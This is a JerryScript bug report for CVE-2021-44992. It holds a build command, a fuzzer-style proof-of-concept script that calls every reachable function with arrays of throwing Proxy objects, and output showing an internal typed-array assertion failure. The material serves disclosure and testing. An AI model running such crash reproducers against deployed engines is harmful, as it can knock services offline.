
CVE-2021-44992: Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma-typedarray-object(ecma_get_typedarray_id) · Issue #4875 · jerryscript-project/jerryscript

The assertion 'ecma_object_is_typedarray (obj_p)' fails at /jerry-core/ecma/operations/ecma-typedarray-object.c in JerryScript 3.0.0.


JerryScript revision

Commit: 51da1551 Version: v3.0.0

Commit: 8ba0d1b Version: v2.4.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

# Debug (--debug), 32-bit (-m32) build with AddressSanitizer and the es2015-subset profile.
# NOTE(review): the reported failure is an internal assertion in this debug build; the page does
# not show how a release build behaves on the same input — confirm before rating impact.
./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

Test case

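/**
 * Tells whether the own property `name` of `obj` holds a value of the given type.
 *
 * @param {object} obj - Object whose own property descriptor is read.
 * @param {string} name - Own property name to inspect.
 * @param {string} [type] - Expected `typeof` result; when omitted, every property matches.
 * @returns {boolean} True when `type` is undefined or `typeof desc.value === type`.
 * @throws {TypeError} When `type` is given and `obj` has no own property `name`
 *   (the descriptor is then undefined and `desc.value` cannot be read).
 */
function isPoT(obj, name, type) {
  let desc;
  // The descriptor is read instead of obj[name], so getters are never invoked here;
  // an accessor property has no `value` field and therefore reports "undefined".
  desc = Object.getOwnPropertyDescriptor(obj, name);
  // String literals use plain ASCII quotes; typographic quotes are a syntax error.
  return typeof type === 'undefined' || typeof desc.value === type;
}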

/**
 * Collects the own property names of `obj` whose values have the requested type.
 *
 * @param {object} obj - Object enumerated with Object.getOwnPropertyNames.
 * @param {string} [type] - `typeof` string passed through to isPoT; omitted means "any".
 * @returns {string[]} Matching names, in the order getOwnPropertyNames returned them.
 */
function getPs(obj, type) {
  let properties = [];

  // getOwnPropertyNames also lists non-enumerable string-keyed properties.
  for (let name of Object.getOwnPropertyNames(obj)) {
    if (isPoT(obj, name, type)) {
      properties.push(name);
    }
  }

  return properties;
}

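/**
 * Walks the object graph depth-first from `root` and yields every own property
 * value whose `typeof` is "object", followed by the values reachable from it.
 *
 * @param {object} [root=this] - Starting object. The default is the caller's
 *   `this`, which is the global object only for a plain call in non-strict code.
 * @param {number} [level=0] - Current recursion depth; levels above 4 yield nothing.
 * @yields {object} Each object-typed property value, parent before descendants.
 */
function* genObj(root = this, level = 0) {
  // The depth cap is the only thing that stops the walk on cyclic graphs.
  if (level > 4) {
    return;
  }

  let obj_names = getPs(root, 'object');

  for (let obj_name of obj_names) {
    // Properties whose name starts with '$' are left out of the walk.
    if (obj_name.startsWith('$')) {
      continue;
    }

    let obj = root[obj_name];
    yield obj;
    // The same object can be reached by several paths, so it may be yielded more than once.
    yield* genObj(obj, level + 1);
  }
}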

/**
 * Gathers the distinct objects produced by genObj() called with its default arguments.
 *
 * @returns {Array} Every value yielded by genObj(), each kept once, in first-seen order.
 */
function JSEtestObj() {
  let objects = [];

  // Linear membership test: genObj() can yield the same object repeatedly.
  for (let obj of genObj()) {
    if (!objects.includes(obj)) {
      objects.push(obj);
    }
  }

  return objects;
}

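/**
 * Lists the own property names of `obj` whose values are functions.
 *
 * @param {object} obj - Object to inspect.
 * @returns {string[]} Names of function-valued own properties, as returned by getPs.
 */
function JSEtestFunc(obj) {
  // Plain ASCII quotes; the typographic quotes in the scraped listing do not parse.
  return getPs(obj, 'function');
}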

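// Proxy whose every property read throws the numeric sentinel 0xc0defefe, so any
// callee that touches a property of its argument elements fails with that value.
const thrower = new Proxy({}, {
  get() {
    throw 0xc0defefe;
  }
});

// Driver: every function-valued own property of every object found by JSEtestObj()
// is called once with a single argument, an array of (declared arity + 1) thrower proxies.
// NOTE(review): the v2.4.0 run on this page ends with a script-level "assertion failed"
// rather than the internal ecma_object_is_typedarray assertion reported for v3.0.0;
// presumably a different path is hit there. Confirm before treating v2.4.0 as affected.
for (let o of JSEtestObj()) {
  for (let f of JSEtestFunc(o)) {
    const arityPlusOne = o[f].length + 1;
    try {
      o[f](Array(arityPlusOne).fill(thrower));
    } catch (e) {
      // The call is retried as a constructor only when the stringified exception contains '1'.
      if (`${e}`.includes('1')) {
        try {
          new o[f](Array(arityPlusOne).fill(thrower));
        } catch (e) {} // deliberately ignored: only an engine-level failure is of interest
      } else {
        // Any other exception is ignored.
      }
    }
  }
}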

Execution steps & Output

Version: v3.0.0

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma_object_is_typedarray (obj_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c(ecma_get_typedarray_id):764.
Error: ERR_FAILED_INTERNAL_ASSERTION

Version: v2.4.0

$ ~/jerryscript-2.4.0/build/bin/jerry poc.js
Script Error: assertion failed
Script backtrace (top 5):
0: poc.js:72

Credits: Found by OWL337 team.
